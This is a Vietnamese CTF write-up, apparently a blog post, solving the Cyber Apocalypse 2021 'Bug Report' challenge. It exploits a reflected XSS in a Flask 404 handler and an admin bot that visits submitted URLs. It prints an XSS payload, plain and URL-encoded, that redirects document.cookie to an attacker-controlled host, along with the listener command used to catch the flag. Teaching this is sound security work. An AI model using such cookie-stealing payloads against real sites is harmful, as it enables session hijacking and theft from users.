+17

Lần này vẫn có source code, nhưng hack thì dễ hơn

Bài trước (Đây là bài trước: https://viblo.asia/p/khi-co-source-code-roi-thi-hack-co-de-khong-maGK7G8AKj2), mình có đưa một câu hỏi là Khi có source code rồi thì hack có dễ không?. Tuy nhiên bài đó thì có vẻ cũng hơi phức tạp, nên nay mình quyết định ra một bài mới Vẫn là có source code, nhưng hack dễ hơn, để viết về một bài nhưng nó đỡ phức tạp hơn bài trước. Cho bạn nào mới tiếp cận review source code thì đỡ bỡ ngỡ hơn.

Nào! Bắt đầu thôi.

1. Đề bài

Vẫn là loạt bài writeup các challenge của cuộc thi Cyber Apocalypse 2021, lần này vẫn là một bài review source code nhưng dễ hơn. Và vẫn là câu nói cũ Mình rất hứng thú với mấy bài review source code, vì đó là sở trường của mình.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.40.25.png

Source code cho như dưới đây.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.41.31.png

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.41.38.png

2. Bắt đầu chiến nào

Như mình đã nói ở trên lần này vẫn là một bài review source code nhưng dễ hơn. Tại sao mình lại nói như thế? Vì đơn giản là nó dễ thật.

2.1 Tìm hiểu chức năng có lỗi

Khi mở source code, đập vào mắt mình là một chức năng gặp lỗi. https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/error-handling-404.png

@app.errorhandler(404)
def page_not_found(error): 
    return "<h1>URL %s not found</h1><br/>" % unquote(request.url), 404

Vì sao mình khẳng định là đoạn code này có lỗi?

Mình giải thích luôn, với biến request.url là sẽ lấy đường dẫn đầy đủ của ứng dụng. Ví dụ trong trường hợp này ứng dụng đang chạy port 1337 và đường dẫn có thể dẫn đến lỗi 404 là /not-found, thì request.url sẽ trả về là http://domain/not-found.

Hàm unquote() thì được mô tả là Replace %xx escapes with their single-character equivalent. The optional encoding and errors parameters specify how to decode percent-encoded sequences into Unicode characters, as accepted by the bytes.decode() method. Ok, vậy hiểu đơn giản nhé, thì nó sẽ urldecode. Ví dụ: %22Manhnv%22 => "Manhnv".

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/unquote-function.png

Tham khảo thêm tại đây: https://docs.python.org/3/library/urllib.parse.html

Để chứng minh điều này, tôi dựng lại source trên local và chạy nó nhé.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/not-found.png


Oh, vậy rồi sao? làm gì tiếp theo?

Tôi để ý dòng return "<h1>URL %s not found</h1><br/>" % unquote(request.url), nó sử dụng nối chuỗi để return về mà không filter hay escape gì cả, vậy thì đây là một lỗi XSS. Tôi thử một đoạn XSS đơn giản như vầy.

"><script>alert(1)</script>

Url encode sẽ là

%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Đường dẫn đầy đủ

http://138.68.147.93:31927/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.43.52.png

Đấy, XSS đó thấy chưa nào.


2.2 Tìm hiểu cách hoạt động của bot

Đến đây, có XSS rồi thì để ý tiếp nhé.

Trong source code có một file bot.py. Tôi cần tìm hiểu cách nó hoạt động.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/source-code-bot.png

File bot.py có một hàm tên là visit_report(), tham số truyền vào là một url. Khi hàm này được gọi (call), ứng dụng sẽ sử dụng thư viện selenium dùng chromedriver làm browser để thực hiện mở http://127.0.0.1:1337/, sau đó browser sẽ được add cookie (trong cookie được add có chứa flag). Tiếp theo browser thực hiện mở đường dẫn trong biến url được truyền vào dòng 37 browser.get(url). Đến đây, tạm thời hiểu được cách hoạt động của bot.

2.3 Tìm hiểu cách để call function của bot như ý

Tiếp tục tìm hiểu chức năng khác, khi vào web có một form submit như dưới

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.40.25.png

Đại loại là: Hãy submit cho chúng tôi URL mà bạn không truy cập được

Khi tôi thử điền gì đó và submit thì thấy ứng dụng call đến API /api/submit. Nhìn lại source code xem thử ứng dụng xử lý những gì khi đi vào /api/submit.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/api-submit.png

@app.route("/api/submit", methods=["POST"])
def submit():
    try:
        url = request.json.get("url")
        
        assert(url.startswith('http://') or url.startswith('https://'))
        visit_report(url)

        return {"success": 1, "message": "Thank you for your valuable submition!"}
    except:
        return {"failure": 1, "message": "Something went wrong."}

Giải thích: Khi đi vào /api/submit, ứng dụng sẽ lấy giá trị từ biến url của dữ liệu gửi lên. Sau đó kiểm tra xem có phải là đường dẫn hay không bằng cách kiểm tra sự tồn tại của http hoặc https ở đầu chuỗi, nếu không có sẽ raise ra lỗi.

assert(url.startswith('http://') or url.startswith('https://'))

Sau đó biến url sẽ được truyền vào function visit_report().

3. Khai thác thôi

Từ những điều tìm hiểu được bên trên, tôi có thể hình dung ra ứng dụng đang có một số điểm có thể khai thác được như sau:

  1. Ứng dụng gặp lỗi XSS
  2. Ứng dụng có Bot sẽ request cùng cookie chứa đến đường dẫn do người dùng gửi lên.

Như vậy, ý tưởng tôi có là: Tạo một đường dẫn có XSS với payload javascript là để steal cookie và submit lên để bot request tới đường dẫn đó.

Tôi viết một payload như sau:

http://127.0.0.1:1337/<script tyle="text/javascript">document.location='http://**<ip-attacker>**:8000/?c='+document.cookie;</script>

Sau khi Url encode

http://127.0.0.1:1337/%3c%73%63%72%69%70%74%20%74%79%6c%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%3c%69%70%2d%61%74%74%61%63%6b%65%72%3e%3a%38%30%30%30%2f%3f%63%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e

Trên server của tôi, tôi tạo một http simple server như sau:

python3 -m http.server 8000

Bây giờ chỉ việc submit payload vào form submit.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.48.53.png

Kiểm tra server và nhận được flag.

https://manhnv.com/images/posts/ctf/Cyber-Apocalypse-2021/Bug-Report/Screen_Shot_2021-04-24_at_23.49.24.png

Flag là: CHTB{th1s_1s_my_bug_r3p0rt}

Kết luận

Một bài khá là dễ, tuy nhiên khá là hay. Đọc qua bài này, hi vọng các bạn có thể hiểu cách mình tìm hiểu và khai thác lỗi khi có source code như thế nào.

Các bạn có thể đọc thêm nhiều nhiều và rất nhiều bài viết của mình tại đây: https://manhnv.com để ủng hộ mình nha.


All rights reserved

Viblo
Hãy đăng ký một tài khoản Viblo để nhận được nhiều bài viết thú vị hơn.
Đăng kí